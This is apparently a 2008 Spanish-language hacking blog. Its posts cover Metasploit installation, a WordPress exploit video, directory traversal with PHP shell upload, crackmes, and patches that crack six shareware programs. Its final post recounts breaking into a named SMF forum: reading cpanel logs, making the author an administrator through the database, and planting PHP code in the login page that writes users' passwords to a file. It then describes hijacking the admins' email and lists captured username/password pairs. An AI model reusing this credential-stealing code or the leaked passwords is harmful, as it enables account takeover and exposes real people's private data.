Informatic - Tutorial - Hacking

2/20/2008 - Download The MP3 Direct of mp3tube.net

Hello

This tutorial is for download and obtain in your pc the mp3 direct of the webpage mp3tube.net and you

 

did not find in the source code the link direct,then look this tutorial in format .pdf 

 

El articulo esta en español sin descargar

 

The tutorial is in spanish Online

 

http://www.geocities.com/spriteversus/Atenea/Mp3Tube.pdf

Permanent Link

2/20/2008 - Video CGI Directorio Transversal + Upload shell in format php whit command's in parameter | |

EL video trata de ver el directorio transversal....ademas de usar comandos unix para subir una shell y tener un acceso competo graficalmente,la shell es en php...desde un link externo que no interpreta el php en el servidor...entonces tranquilamente se ejecuta en el servidor de la victima

 

El link de descarga directa del video se encuentra aca

http://www.designerworldgfx.net/atenea/proxy/videos/cgidef.rar

Permanent Link

2/20/2008 - Metaspoit Framwork 3.0 in the distribution Atenea Linux installation

Hola

en la pagina oficial de www.metasploit.com estan disponibles 2 versiones de descarga del metasploit framework la version 2 y la  version 3...

en la distribucion atenea la version 2 se instala rapido y funciona rapido

la version 3 funciona,pero hay q hacer algunas modificaciones primero,que pasare a explicar...

Primero descargarmos el Metasploit Framework 3.0 para unix

tar zxvf file.tar.gz

cd folder


ya lo tenemos descomprimidos,si quieren activar el msfconsole or el msfweb le daran problema por el comando ruby y sus librerias,aca en atenea debemos instalarlos

ftp://ftp.ruby-lang.org/pub/ruby/ruby-1.8.6.tar.gz "El source" para el command

tar xzvf file.tgz

cd folder


"Recomendacion es q tengas varias terminales abiertas para el manejo"

Descargar http://www.rubygems.org/  "para los modules" y el uso del gem en la terminal

esto es importante ya q la vesion 3 del metasploit usa el .rb y no los modules del perl .pm como en la version 2

tar xzvf file.tar.gz

cd folder


tenemos 3 terminales...

en la ultima terminal estamos en la carpeta y typeamos  "ruby setup.rb"

en la segunda terminal typeamos "./configure" despues "make" y despues "make install"

en la primer terminal typeamos msfweb y nos pedira algo y typeamos "gem install -v=1.2.2 rails"

te pedira que pongas Y Or N "pones Y claro"

y despues poines msfweb y ya tenes corriendo el metasploit,vas al navegador como siempre y pones

 127.0.0.1:55555

Ready

Permanent Link

2/20/2008 - Bug en Wordpress found in waraxe + video

Hola

Aca hice el video del uso del exploit en php para wordpress posteado en waraxe,lo hice por el motivo que habia dudas sobre como usarlo,algunos querian usar el bamcompile otros subirlo a un host free q soporte php y ejecutarlo desde ahi...

El video y el uso del exploit lo hice en atenea linux,en esta distro tuve q descargar el curl y el xampp para el apache....y asi tener el uso del php en la terminal

En windows se puede hacer tambien,cambian algunas cosas y ademas tiene mas configuraciones q hacer,hay q descargar el curl.exe con sus lib para win32 y en el php.ini cambiar algunas lineas como el curl_php.dll quitarle el ";" y en la ruta de extension_dir aclarar la ruta del appserv en mi caso y ademas se debe exportar 2 librerias al system32 y poner una libreria nueva tambien y el uso es lo mismo,por consola  sin necesidad de host free

el video en cuestion es este

http://www.badongo.com/es/file/3570885

El video fue hecho con el xvidcap con extension .avi por eso el peso del video es un poco pesado al rededor de 40 Mb pero la ventaja es q con el propio reproductor de win puedes reproducirlo

Permanent Link

2/20/2008 - C0dgin-M3 New

Aca hice otro crackme llamado C0ding-M3 New.... esta mas dificil que el primero....pero igual se puede conseguir crackearlo

la descarga es el cl0sed.rar

http://usuarios.lycos.es/ret0deface/c0

Pistas? tienes mas de 2 objetivos para llegar hasta el resultado


Permanent Link

2/20/2008 - AutoRun Cd/Dvd

Hola,este pequeño programa que hice se trata de dar el funcionamiento nuevamente a la lectora & grabadora cuando deja de funcionar el autorun y el cd/dvd no arranca automaticamente

La descarga

http://usuarios.lycos.es/ret0deface/c0


Permanent Link

2/20/2008 - C0dingMe

Hola este pequeño Crackme q hize llamado C0dingMe deben conseguirlo

ink de descargar : http://usuarios.lycos.es/ret0deface/c0

Pistas: Es facil...si no te conformas con eso...pide mas pistas,no problem


Permanent Link

2/20/2008 - Six's Software Shareware & Six's Patch

Esta pagina da 6 programas utiles programados en Visual Basic.... que debes pagar si te gustan....lo que hize fue probar con uno y al poder saltar la proteccion,probe con los demas y tenian la misma proteccion,asi que el siguiente paso fue hacerme los 6 Patch's



Los 6 Patch's estan aca


http://usuarios.lycos.es/ret0deface/patch





Permanent Link

2/20/2008 - Video De compilacion de ASM con el TASM

Bueno he visto por ahi muchas preguntas de volver un .exe a partir de un Code en ASM...en este caso el video se usa el TASM para aplicaciones de 16 Bits ms-dos sin uso de macros para 32 bits

Aca el video online

http://usuarios.lycos.es/ret0deface/tasm/tasm.html

Permanent Link

2/20/2008 - Keylogger In SMF


 

Hola repetire la historia nuevamente

Comentare que le paso al foro www.fusionwarez.org

EL foro estaba alojado en un servidor dns.movile unix,yo tenia una shell ahi que un amigo me paso....quizas muchos se harian root y le darian el deface a todas las webs hospedadas ahi....

pero aca el proposito fue otro,cuando me di cuenta q el servidor daba comodidad de cpanel,empeze a buscar todas las cuentas...

cat /var/cpanel/accounting.log

Entre todas las cuentas hospedadas vi el foro en cuestion...

Al entrar a la carpeta tenia permisos en el index del foro y en el settings se podria haber hecho el deface tranquilamente...pero aca viene lo distinto...

Cuando vi la entrada del foro vi el login si o si debias registrarte para navegar por el foro y ver los post,no podias estar como invitado...

Entonces primero me fui a la DB y en la tabla smf_members busque mi nickname para darme permisos de administrador en el ID_GROUP me puse un "1" y entre al foro y me hize el backup para tener los email ocultos y los nombres ocultos rapidamente...

Despues de obtener el Backup volvi al ID_GROUP "0" y me quede como un usuario normal

entonces al tener permisos en el index modifique el index pero no para un "deface" sino para troyanizar el login teoricamente.... lo que puse fue el siguiente code...

Abajo del time_start

if((isset($_POST['passwrd'])) && (isset($_POST['user']))) {
$passwrd = $_POST['passwrd'];
$users = $_POST['user'];
$crea = fopen("Packages/instaled.txt","a");
fwrite($crea, "$users|$passwrd|
   ");
 fclose($crea); }



Despues de 3 dias de dejar el index asi...habia obtenido varias claves con sus users en la carpeta Packages y en el archivo de texto instaled...solo podian darse cuenta si entraban al servidor,al cpanel o al ftp...

Despues de obtener todos los datos habia una seccion en el foro llamada ing social que me intereso y quize probar eso... Los administradores cometieron un error que cometen muchos, "usar la misma clave para un foro y para un correo" entonces entre al correo de los administradores ,los cambie por un cierto tiempo para tener tiempo de usarlas....la verdad que ser administrador tiene sus  ventajas...me confesaban sus claves o aceptabana cualquier archivo, ejemplo "un server" donde esas personas tenian otras webs como admin y asi se hizo una escala de ing social,como a karlit0z....

Despues de esta travesura se le devolvio la cuenta a los administradores incluyendo a hebergonz que de nick era speedmaster y se le devolvio la cuenta al admin Duck...

Algunas contraseñas capturadas fueron esta


   kento|terminador|
   doctorsergio5|6189268|
   DUCK|471521|
   dagil|pa28101987to|
   msiemon|churango|
   ..::D4n13L::..|20031987|
   Angel|260489|
   manuelito|2485351|
    Anmy|0312123|
   hadesmarc|maoc12345|               
   hebergonz|vilmapacheco|
   hebergonz|vilmapacheco.87|
   msiemon|churango|

Permanent Link

About Me

Tutoriales - Hacking - Personal

Links

Home
View my profile
Archives
Friends
Email Me

Friends

Login | Browse Blog Directory | Free Blog Hosting Blogger Team - Start Your Own Blog